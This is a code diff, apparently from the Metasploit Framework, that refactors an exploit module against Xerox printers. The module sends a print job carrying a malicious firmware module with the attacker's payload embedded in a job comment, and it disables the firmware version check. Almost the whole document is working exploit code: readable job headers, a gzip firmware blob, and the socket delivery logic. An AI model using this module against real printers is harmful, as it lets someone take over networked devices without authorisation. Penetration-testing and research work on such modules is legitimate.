11##
2- # This module requires Metasploit: http//metasploit.com/download
2+ # This module requires Metasploit: http: //metasploit.com/download
33# Current source: https://github.com/rapid7/metasploit-framework
44##
55
@@ -50,37 +50,16 @@ def initialize(info = {})
5050
5151 def exploit
5252 print_status ( "Sending print job to #{ rhost } )
53- firmcode = "\x25 \x25 \x58 \x52 \x58 \x62 \x65 \x67 \x69 \x6E \x0A \x25 \x25 \x4F \x49 \x44 "
54- firmcode << "\x5F \x41 \x54 \x54 \x5F \x4A \x4F \x42 \x5F \x54 \x59 \x50 \x45 \x20 \x4F \x49 "
55- firmcode << "\x44 \x5F \x56 \x41 \x4C \x5F \x4A \x4F \x42 \x5F \x54 \x59 \x50 \x45 \x5F \x44 "
56- firmcode << "\x59 \x4E \x41 \x4D \x49 \x43 \x5F \x4C \x4F \x41 \x44 \x41 \x42 \x4C \x45 \x5F "
57- firmcode << "\x4D \x4F \x44 \x55 \x4C \x45 \x0A \x25 \x25 \x4F \x49 \x44 \x5F \x41 \x54 \x54 "
58- firmcode << "\x5F \x4A \x4F \x42 \x5F \x53 \x43 \x48 \x45 \x44 \x55 \x4C \x49 \x4E \x47 \x20 "
59- firmcode << "\x4F \x49 \x44 \x5F \x56 \x41 \x4C \x5F \x4A \x4F \x42 \x5F \x53 \x43 \x48 \x45 "
60- firmcode << "\x44 \x55 \x4C \x49 \x4E \x47 \x5F \x41 \x46 \x54 \x45 \x52 \x5F \x43 \x4F \x4D "
61- firmcode << "\x50 \x4C \x45 \x54 \x45 \x0A \x25 \x25 \x4F \x49 \x44 \x5F \x41 \x54 \x54 \x5F "
62- firmcode << "\x4A \x4F \x42 \x5F \x43 \x4F \x4D \x4D \x45 \x4E \x54 \x20 \x22 \x50 \x72 \x61 "
63- firmcode << "\x65 \x64 \x61 \x50 \x57 \x4E \x32 \x30 \x31 \x34 \x3A "
64- firmcode << "#{ payload . encoded } \x3A "
65- firmcode << "\x22 \x0A \x25 \x25 \x4F \x49 \x44 \x5F \x41 \x54 \x54 \x5F \x4A \x4F \x42 \x5F "
66- firmcode << "\x43 \x4F \x4D \x4D \x45 \x4E \x54 \x20 \x22 \x70 \x61 \x74 \x63 \x68 \x20 \x54 "
67- firmcode << "\x68 \x75 \x20 \x4F \x63 \x74 \x20 \x32 \x33 \x20 \x31 \x39 \x3A \x31 \x34 \x3A "
68- firmcode << "\x32 \x34 \x20 \x45 \x44 \x54 \x20 \x32 \x30 \x31 \x34 \x22 \x0A \x25 \x25 \x4F "
69- firmcode << "\x49 \x44 \x5F \x41 \x54 \x54 \x5F \x44 \x4C \x4D \x5F \x4E \x41 \x4D \x45 \x20 "
70- firmcode << "\x22 \x78 \x65 \x72 \x6F \x78 \x22 \x0A \x25 \x25 \x4F \x49 \x44 \x5F \x41 \x54 "
71- firmcode << "\x54 \x5F \x44 \x4C \x4D \x5F \x56 \x45 \x52 \x53 \x49 \x4F \x4E \x20 \x22 \x4E "
72- firmcode << "\x4F \x5F \x44 \x4C \x4D \x5F \x56 \x45 \x52 \x53 \x49 \x4F \x4E \x5F \x43 \x48 "
73- firmcode << "\x45 \x43 \x4B \x22 \x0A \x25 \x25 \x4F \x49 \x44 \x5F \x41 \x54 \x54 \x5F \x44 "
74- firmcode << "\x4C \x4D \x5F \x53 \x49 \x47 \x4E \x41 \x54 \x55 \x52 \x45 \x20 \x22 \x63 \x61 "
75- firmcode << "\x33 \x36 \x31 \x30 \x34 \x37 \x64 \x61 \x35 \x36 \x64 \x62 \x39 \x64 \x64 \x38 "
76- firmcode << "\x31 \x66 \x65 \x65 \x36 \x61 \x32 \x33 \x66 \x66 \x38 \x37 \x35 \x66 \x61 \x63 "
77- firmcode << "\x63 \x33 \x64 \x66 \x30 \x65 \x31 \x31 \x35 \x33 \x64 \x33 \x32 \x35 \x63 \x32 "
78- firmcode << "\x64 \x32 \x31 \x37 \x63 \x30 \x65 \x37 \x35 \x66 \x38 \x36 \x31 \x62 \x22 \x0A "
79- firmcode << "\x25 \x25 \x4F \x49 \x44 \x5F \x41 \x54 \x54 \x5F \x44 \x4C \x4D \x5F \x45 \x58 "
80- firmcode << "\x54 \x52 \x41 \x43 \x54 \x49 \x4F \x4E \x5F \x43 \x52 \x49 \x54 \x45 \x52 \x49 "
81- firmcode << "\x41 \x20 \x22 \x65 \x78 \x74 \x72 \x61 \x63 \x74 \x20 \x2F \x74 \x6D \x70 \x2F "
82- firmcode << "\x78 \x65 \x72 \x6F \x78 \x2E \x64 \x6E \x6C \x64 \x22 \x0A \x25 \x25 \x58 \x52 "
83- firmcode << "\x58 \x65 \x6E \x64 \x0A \x1F \x8B \x08 \x00 \xB1 \x8B \x49 \x54 \x00 \x03 \xED "
53+ firmcode = '%%XRXbegin' + "\x0A "
54+ firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A "
55+ firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A "
56+ firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{ payload . encoded } + ':"' + "\x0A "
57+ firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A "
58+ firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A "
59+ firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A "
60+ firmcode << '%%OID_ATT_DLM_SIGNATURE "ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "\x0A "
61+ firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' "\x0A "
62+ firmcode << '%%XRXend' + "\x0A \x1F \x8B \x08 \x00 \xB1 \x8B \x49 \x54 \x00 \x03 \xED "
8463 firmcode << "\xD3 \x41 \x4B \xC3 \x30 \x14 \x07 \xF0 \x9E \xFB \x29 \xFE \xE2 \x60 \x20 \x74 "
8564 firmcode << "\x69 \x63 \x37 \x61 \x5A \xBC \x79 \x94 \xDD \x3C \xC8 \xA0 \x59 \x9B \xDA \x4A "
8665 firmcode << "\xD7 \xCC \xB4 \xD3 \x1D \xF6 \xE1 \x8D \xDD \x64 \xB8 \x83 \x3B \x0D \x11 \xFE "
@@ -102,13 +81,13 @@ def exploit
10281 firmcode << "\x01 \x5A \x18 \x54 \xBB \x00 \x28 \x00 \x00 "
10382
10483 begin
105- connect ( true , 'RPORT' => datastore [ 'RPORT' ] . to_i )
84+ connect
10685 sock . put ( firmcode )
10786 handler
108- disconnect
109- rescue
87+ rescue Rex ::ConnectionError , Rex ::ConnectionRefused , Rex ::ConnectionTimeout
11088 print_error ( "Error connecting to #{ rhost } )
111- return
89+ ensure
90+ disconnect
11291 end
11392 end
11493end
0 commit comments